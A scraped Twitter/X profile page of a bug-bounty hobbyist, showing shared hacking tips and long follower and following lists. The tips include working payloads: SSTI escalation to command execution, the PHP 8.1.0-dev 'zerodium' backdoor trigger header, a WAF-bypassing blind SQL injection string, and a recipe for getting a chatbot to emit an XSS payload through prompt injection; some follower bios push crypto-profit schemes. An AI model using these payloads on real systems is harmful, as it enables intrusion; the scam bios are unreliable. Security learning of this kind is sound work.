Ismail @Ismailpy_Crypto
Tanger - Tétouan, Royaume du M Joined August 2021-
Tweets269
-
Followers30
-
Following334
-
Likes46
🧠 SSTI → Remote Code Execution 1️⃣ App renders user input in template engine 2️⃣ Attacker sends payload: {{7*7}} 3️⃣ Output: 49 → confirms injection 4️⃣ Escalates to: {{self._globals.os.popen('id').read()}} 🎯 Full RCE via template context #bugbounty #ssti #rce #infosec
If you find PHP 8.1.0-dev then try RCE & SQLi User-Agentt: zerodiumsleep(5); User-Agentt: zerodiumsystem('id'); #bugbounty #bugbountytips #rce #sqli #cybersecurity
10 common JavaScript coding vulnerabilities Practical code examples.🐞💻 1- Open Redirect 2-SSRF 3-Timing Attacks 4-prototype pollution 5-NoSQLi 6-ReDoS 7-misconfiguration 8-Hard Code Vulnerability 9-mass assignment 10-Host Header Injection #BugBountyTip youtube.com/watch?v=ypNKKY…
Define the depth of your crawl with katana's -d flag. The higher the depth, the more recursive crawls and juicy data you get! 🤤 ⚠️ Higher depths can lead to long crawl times against large web applications.
💉 Complete Guide: The SQL Injection Knowledge Base Website: websec.ca/kb/sql_injecti… author: Roberto Salgado #infosec
JShunter JShunter is a command-line tool designed for analyzing JavaScript files and extracting endpoints. This tool specializes in identifying sensitive data, such as API endpoints and potential security vulnerabilities, making it an essential resource for developers, bug…
Someone make a subdomains database containing 1.6 billion subdomains scrapped from multiple public (and private) sources. This database is now public and FREE and can be queried on the following website. - dash.pugrecon.celes.in #infosec #cybersec #bugbountytips
My New tool s3 ✅ github.com/KingOfBugbount… #bugbounty #bugbountytips #tools #ofjaaah
Misconfig Mapper: A fast tool to help you uncover security misconfigurations on popular third-party services used by your company and/or bug bounty targets GitHub: github.com/intigriti/misc…
I just published a new writeup about Authentication Bypass vulnerability on coinmarketcap. 0xbartita.medium.com/how-i-found-an… #bugbountytips #bugbountytip
Insecure Direct Object Reference (IDOR) Checklist credit : @elsec #bugbounty #bugbountytips #bughunting #penetrationtesting #pentesting #pentest #ethicalhacking #hacking #cybersecuritytips #cybersecurity #informationsecurity #infosec #bugcrowd #bugbountytips #bugbounty
Find the origin servers of websites protected by Cloudflare, Sucuri, or Incapsula with a misconfigured DNS. ⚔️ - github.com/MrH0wl/Cloudma… Credit: @0x0SojalSec #infosec #bugbountytips #Cybersecurity
Cloudflare 403 bypass to time-based blind SQLi: PL: (select(0)from(select(sleep(10)))v) → 403 but PL: (select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v) → Time-based Blind SQLi #BugBounty #SQLi
XSS via Prompt Injection 💥🧠🔓 🤖 Find a chatbot 🧠 Ask what model it is 🔁 Get it to repeat text ⚠️ Make it say: '"><img src=x onerror=alert()> 💥 Escalate to Reflected/Stored XSS via URL param
🚨 New Writeup Alert! 🚨 "I Automated CSP Extraction and Mapped 100+ Subdomains" by Ibtissam hammadi is now live on IW! Check it out here: infosecwriteups.com/adf04880ea5d #cybersecurity #infosec #csp #reconnaissance #bugbounty
BreachForums has possibly returned at their original Onion address with what looks like it's original data. I verified the Canary with the PGP and it is valid. http://breached26tezcofqla4adzyn22notfqwcac7gpbrleg4usehljwkgqd[.]onion
Looks interesting, will try it today 🤗
Looks interesting, will try it today 🤗
Day 144 - Bug Bounty - Went today deep in authentication flows - Learned a lot about different edge cases using different encoding/null bytes - Found this repo, which constantly updates the best ATO H1 reports: github.com/reddelexc/hack… Total earned so far: $5425
⚙️ With @profundisio , you can quickly check DNS records, subdomains, hosts, and their historical data right from your browser. It also offers real-time alerts and a variety of tools to help you keep track of changes and gather information efficiently ! 🔥 give it a try…
Hi All, Published my writeup on "XSS Filter Bypass". I was able to bypass the fix multiple times and learned a lot from this. Read it here: medium.com/@xploiterr/bre… #BugBounty #xss
BlackboxStocks🇺�... @Buabee1416162
43 Followers 2K Following 15-30% Monthly | 2 High-Conviction Stocks.Short-Term Gains: 15-20% in Days/Weeks.DM "JOIN" for WhatsApp Alerts. Live Trade Signals • Market Analysis
Utifwaw @Utifwaw210473
33 Followers 3K Following
Sammy Cronin @CroninSamm3095
41 Followers 3K Following
Lauriane Abernathy @LaurianeAb30860
1 Followers 81 Following Professor Arthur and his team provide cryptocurrency market analysis and earn $500 to $5,000 per day. Click to join WA:https://t.co/WpXvipb7g4
Chathusm @ChathusmqbS3vn
47 Followers 2K Following Diligence is the mother of good plough deep while shuggards sleep,you will have corn to sell and to keep.
Church @kishikanae82132
67 Followers 7K Following
Rejoicing @onogimitsu21876
91 Followers 7K Following
Sheau @SheauPwESbC
43 Followers 4K Following
Shair @ShairhLe
36 Followers 4K Following
UlaJoseph @U0W84r9OJY0C7U
61 Followers 7K Following
MaggieGeordie @1H0YPAwuIT1W0AB
67 Followers 7K Following
LesleyMacAdam @X3z1W3KqZ3M8pY
48 Followers 6K Following
SaraHouston @74i5J10huQ13NR3
61 Followers 7K Following
Gift-Brave @47T4ArigTb1iC
69 Followers 7K Following
NatalieMacAdam @8Jg5IKO64w1ZMb
84 Followers 7K Following
ShirleyHuxley @n77bNi3T83897nZ
47 Followers 5K Following
KittyMichelson @G5yeN651aoa291
58 Followers 7K Following
TheresaLongman @TKo9fp7G8Htq1
65 Followers 7K Following
Hannah Leia @fRu682tY1M98qP
6 Followers 501 Following Earn your own share of the mega companies and allow your money to hustle for you
ModestyBaker @ImYTPiTxMb4AB7
72 Followers 7K Following
Hacker 💉 @Isabellapetro81
28 Followers 89 Following
Hyona @pretend_147
73 Followers 411 Following
DigitalXRAID @DigitalXRAID
577 Followers 1K Following Award Winning UK Based Cyber Security Experts, Specialising in Penetration Testing, Cyber Essentials certification, compliance & GDPR
Cybersecurity Sibiu @CybersecSibiu
16 Followers 548 Following
Abdalkreem @00xalr
731 Followers 575 Following 20 | Cybersecurity | Bug Bounty Hunter | Sharing vulns & tips 💥 | DM = 📥 https://t.co/m5VQqNq6SB , https://t.co/PgopMw9zNY
Muhammad Waseem @wgujjer11
4K Followers 903 Following Cybersecurity Analyst | Ethical Hacker | Secure @nasa | #CyberSecurity #
mhmd berro (badcracke... @badcrack3r
7K Followers 375 Following 22 Years old. Researcher at hackerone. Known as badcracker. Listed at more than 100 companies hacker's hall of fame.
STÖK ✌️ @stokfredrik
135K Followers 1K Following Hi.. im that hacker / creative that your friends told you about., 💫🔮
meg west @cybersecmeg
152K Followers 936 Following Tweets about #dogs & travel & fitness & cybersecurity, oh my! Opinions are my own. 📧: [email protected]
zseano @zseano
79K Followers 703 Following
vx-underground @vxunderground
377K Followers 294 Following The largest collection of malware source code, samples, and papers on the internet. Password: infected
TCM Security @TCMSecurity
208K Followers 358 Following Come learn to hack at TCM Security Academy! Veteran owned. Quality results.
NetworkChuck @NetworkChuck
220K Followers 636 Following Believer. Beard. Coffee. Tech. Youtube. Check the link in my bio to see my latest video!
Hacking Articles @hackinarticles
278K Followers 452 Following House of Pentesters Join us: https://t.co/Y6XOlSOA92
Katie Paxton-Fear @InsiderPhD
93K Followers 2K Following Dr, apparently. Security Adovcate @semgrep & Hacker. #BugBounty hunter & #infosec YouTuber. APIs & Interlinked OffSec, PhD in AI+Sec @hacknotcrime. she/her
Luke Stephens (hakluk... @hakluke
96K Followers 2K Following Hacker, marketer. I manage socials and produce amazing technical blogs for cybersecurity orgs. Founder of @hacker_content and @haksecio
Hadrian @hadriansecurity
2K Followers 41 Following Digital security insights from a hacker’s perspective
JS0N Haddix @Jhaddix
167K Followers 7K Following CEO, CISO, Trainer, Hacker, and Speaker. Cybersecurity + Hacking + AI + Sec Leadership @arcanuminfosec
Kirill Firsov @k_firsov
3K Followers 286 Following Founder and Chairman of @FearsOff | Protecting the World’s Top Crypto Exchanges & Financial Institutions | Cybersecurity Enthusiast
Bug Bounty World 🌍... @bugbountyworld_
1K Followers 437 Following Bug bounty tips & tricks! 🐞 Learn hacking, stay updated & grow your skills. 📺 Watch full videos on YouTube: Bug Bounty World ⬇️
Suhrad @SuhradMakwana
3K Followers 996 Following All Things Growth, BD, Product! Prev. Founder @Securrtech (100+ Projects Protected & $2B+ Secured) Running @trackt_club | Anon @Menaxa_xyz
Chocapikk 🤘🏻 @Chocapikk_
3K Followers 267 Following Exploit Dev. CVEs for fun 🇫🇷 Security Researcher & Software Developer @leak_ix ☁️ Views are my own 🧠
DarkShadow @darkshadow2bd
3K Followers 18 Following Ethical Hacker | Penetration Tester | Security Researcher | Bug Hunter | Exploit Developer. 🔥~For more Join my New telegram Channel👉🏼 https://t.co/9p1yvzluA4 ✨
CaptinSHArky(Mahdi�... @SalhiMahdi72759
835 Followers 544 Following وَأَنْ لَيْسَ لِلْإِنْسَانِ إِلَّا مَا سَعَىٰ |Look for “No”s| 🔍 | Bug Bounty Hunter 🐞 | https://t.co/QKW2cvw4GE all my links
AmirMohammad Safari @AmirMSafari
7K Followers 390 Following
Gray Hats @the_yellow_fall
9K Followers 379 Following Welcome to the Daily Cybersecurity site, your trusted source for cybersecurity news and insights since 2017!
doomerhunter (Victor ... @DoomerOutrun
3K Followers 1K Following MVH @ H1-468 | Exterminator H1-6102 Salesforce | Most Impactful Team H1-0131 AWS x Amazon | Best collab H1-407 | Bootstrapped a 7 figs biz | Victor Poucheret
lemon @lmncode
4K Followers 3K Following Web3 Developer | DAO Contributor Threads, tools, and dev experiments.
Ahmet Göker🇹🇷�... @_shadowintel_
4K Followers 689 Following Soyut düşünceler / Security (academic) 🇳🇱🇹🇷🇬🇧
YasserGersy 🇵🇸 @yassergersy
2K Followers 977 Following Building stuff that breaks others stuff | Coding | Info-Sec
Gospel @4osp3l
16K Followers 7K Following Offensive Security | Christain | Full-Time Bug Bounty Hunter On @yeswehack | 0x19 | God Is Everything
Harley Kimball @infinitelogins
7K Followers 1K Following Hacker Community Cultivator, Pentester, Bug Bounty Hunter | Co-Founder of @BugBountyDEFCON | Founder of Disclosed. (link in bio)
Frey @Freyxfi
5K Followers 67 Following 24 y/o Pentester and MMA Player love to exploit web 🕸️ | https://t.co/LGRIAkn3dR | LW (9-0-0) 🥇// And I do everything solo 🐺
NullSecX @NullSecurityX
6K Followers 109 Following Hacking Group https://t.co/4D4Ewi7xmL collaborations & sponsorships; [email protected]
Ethical Hacker @whithat444
324 Followers 292 Following Security Researcher / Penetration Tester Gmail - [email protected]
H4RUK7 KIRA 🇯🇵�... @h4ruk7
4K Followers 370 Following OFFENSIVE SEC|RED TEAM OPS|BOUNTY HUNTER|PENETRATION TESTER|MANGA WRITER & ARTIST|CEO @HSC_Consult|OSINT INVESTIGATOR
Dung Le @LTiDiii
824 Followers 780 Following FlySec Co-Founder: https://t.co/3ipcsYPW2y; Grind now. Greatness later.
0xdf @0xdf_
25K Followers 467 Following Training Architect @ HackTheBox "Potentially a legit security researcher" he/him https://t.co/GCcLVlmdQK https://t.co/uQWVpw4nft 0xdf on discord
🦆 SchizoDuckie �... @SchizoDuckie
3K Followers 1K Following The lamest hacker you know. I find the stuff you leaked online. Developer by day, Researcher at @divdnl by night. Restoring my 1928 fixer-upper house inbetween.Trends for United States
You might like
